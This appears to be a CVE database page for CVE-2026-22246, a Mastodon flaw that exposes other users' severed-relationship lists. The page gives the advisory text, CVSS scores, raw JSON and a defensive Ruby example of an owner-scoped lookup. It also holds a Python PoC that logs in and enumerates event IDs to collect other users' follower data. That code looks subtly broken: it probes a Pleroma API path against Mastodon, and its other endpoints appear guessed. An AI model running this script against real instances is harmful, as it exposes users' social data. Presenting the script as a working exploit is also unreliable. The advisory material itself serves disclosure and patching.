Security Vulnerability Report
CVE-2026-22246 CVSS 6.5 MEDIUM

Published: 2026-01-08 16:16:03
Last Modified: 2026-01-22 13:52:29

Description

Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4.
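The defect described above is an ownership check missing from a per-user lookup: an event is fetched by id alone, so any logged-in account can walk the id space. The Ruby below is an illustration added here, not Mastodon's code and not taken from the referenced patches; it contrasts an id-only lookup with one scoped to the requesting account. The SeveranceEvent struct, the in-memory EVENTS table, the account ids and the handles are constructed stand-ins for the real database models.

```ruby
# Added illustration of the missing ownership check (not Mastodon's code).
# SeveranceEvent and EVENTS are constructed in-memory stand-ins for the
# real models; the account ids and handles below are made up.
SeveranceEvent = Struct.new(:id, :account_id, :lost_followers, :lost_following)

EVENTS = [
  SeveranceEvent.new(1, 100, ["alice@example.org"], []),
  SeveranceEvent.new(2, 200, ["bob@example.org", "carol@example.org"], ["dave@example.org"]),
].freeze

class NotFound < StandardError; end

# Vulnerable pattern: the event is looked up by id alone. Any authenticated
# caller can walk ids 1, 2, 3, ... and read every account's lost relationships.
def severed_relationships_unscoped(_current_account_id, event_id)
  event = EVENTS.find { |e| e.id == event_id }
  raise NotFound unless event
  { followers: event.lost_followers, following: event.lost_following }
end

# Fixed pattern: the lookup is scoped to the caller's own events first, so an
# id belonging to another account is indistinguishable from a nonexistent one.
def severed_relationships_scoped(current_account_id, event_id)
  own_events = EVENTS.select { |e| e.account_id == current_account_id }
  event = own_events.find { |e| e.id == event_id }
  raise NotFound unless event
  { followers: event.lost_followers, following: event.lost_following }
end

# Review check: how many of the stored events can one account read through
# each lookup? The unscoped lookup exposes all of them.
def readable_event_count(current_account_id, lookup)
  EVENTS.map(&:id).count do |id|
    begin
      send(lookup, current_account_id, id)
      true
    rescue NotFound
      false
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "unscoped: #{readable_event_count(100, :severed_relationships_unscoped)}"  # 2
  puts "scoped:   #{readable_event_count(100, :severed_relationships_scoped)}"    # 1
end
```

In a Rails controller the same distinction is the difference between looking a record up on the model class by `params[:id]` and looking it up through the current account's own association, where a foreign id raises a not-found error instead of returning another user's list. The second form is the check to look for when reviewing any endpoint that serves per-user data by id.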

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE (Mastodon 4.3.0 - 4.3.16)
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE (Mastodon 4.4.0 - 4.4.10)
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE (Mastodon 4.5.0 - 4.5.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

# CVE-2026-22246 PoC - Mastodon Unauthorized Access to Severed Relationships
import requests
import json
from urllib.parse import urljoin


def exploit_mastodon_severed_relationships(base_url, username, password):
    """
    Exploit CVE-2026-22246: Unauthorized access to severed relationship notifications

    This PoC demonstrates how any authenticated local user can access severed
    relationship lists belonging to other users by iterating through event IDs.
    """
    session = requests.Session()

    # Step 1: Authenticate as a regular local user
    login_url = urljoin(base_url, '/auth/sign_in')
    login_data = {
        'user[email]': username,
        'user[password]': password
    }
    response = session.post(login_url, data=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return None
    print("[+] Successfully authenticated")

    # Step 2: Access severed relationships API endpoint
    # The vulnerable endpoint allows access to any user's severed events
    severed_api_endpoints = [
        '/api/v1/pleroma/follow_requests',
        '/api/v1/notifications/severed_relationships',
        '/api/v1/accounts/relationships/severed'
    ]
    leaked_data = []

    for endpoint in severed_api_endpoints:
        api_url = urljoin(base_url, endpoint)

        # Step 3: Iterate through event IDs to access other users' data
        for event_id in range(1, 1000):
            params = {'event_id': event_id}
            response = session.get(api_url, params=params)
            if response.status_code == 200:
                data = response.json()
                if data and len(data) > 0:
                    print(f"[+] Found severed relationships for event {event_id}")
                    print(f"    Data: {json.dumps(data, indent=2)}")
                    leaked_data.append({
                        'event_id': event_id,
                        'endpoint': endpoint,
                        'data': data
                    })

    # Step 4: Compile and analyze the leaked information
    print(f"\n[+] Total leaked records: {len(leaked_data)}")
    print("[+] Leaked information includes:")
    print("    - Lost followers (accounts that unfollowed)")
    print("    - Lost following (accounts that were unfollowed)")
    print("    - Account IDs involved in moderation actions")
    return leaked_data


# Usage example
if __name__ == '__main__':
    target = 'https://vulnerable-mastodon-instance.com'
    credentials = ('[email protected]', 'password123')
    results = exploit_mastodon_severed_relationships(target, *credentials)
    if results:
        print(f"\n[!] Vulnerability confirmed - {len(results)} records leaked")

References

https://github.com/mastodon/mastodon/commit/68e30985ca7afdb89af1b2e9dc962e1993dc8076 (Patch)
https://github.com/mastodon/mastodon/commit/b2bcd34486fd6681cc0f30028086ef0f47282adf (Patch)
https://github.com/mastodon/mastodon/commit/c1fb6893c5175d74c074f6f786d504c8bc610d57 (Patch)
https://github.com/mastodon/mastodon/security/advisories/GHSA-ww85-x9cp-5v24 (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22246",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T16:16:02.957",
    "lastModified": "2026-01-22T13:52:28.883",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4."
      },
      {
        "lang": "es",
        "value": "Mastodon es un servidor de red social gratuito, de código abierto, basado en ActivityPub. Mastodon 4.3 añadió notificaciones de relaciones cortadas, permitiendo a los usuarios finales inspeccionar las relaciones que perdieron como resultado de una acción de moderación. El código que permite a los usuarios descargar listas de relaciones cortadas para un evento particular no verifica al propietario de la lista antes de devolver las relaciones perdidas. Cualquier usuario local registrado puede acceder a la lista de seguidores perdidos y usuarios seguidos causada por cualquier evento de corte, y revisar todos los eventos de corte de esta manera. La información filtrada no incluye el nombre de la cuenta que ha perdido seguimientos y seguidores. Esto ha sido corregido en Mastodon v4.3.17, v4.4.11 y v4.5.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-201"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.3.17",
                "matchCriteriaId": "6B2706E5-A6D0-4790-A3E6-5DE023465AB2"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.4.0",
                "versionEndExcluding": "4.4.11",
                "matchCriteriaId": "DD92863A-CB76-45AA-BF4D-9870B24E8109"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.5.0",
                "versionEndExcluding": "4.5.4",
                "matchCriteriaId": "3E8FBAF5-C7BC-4980-9780-50BA935D126B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mastodon/mastodon/commit/68e30985ca7afdb89af1b2e9dc962e1993dc8076",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mastodon/mastodon/commit/b2bcd34486fd6681cc0f30028086ef0f47282adf",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mastodon/mastodon/commit/c1fb6893c5175d74c074f6f786d504c8bc610d57",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-ww85-x9cp-5v24",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}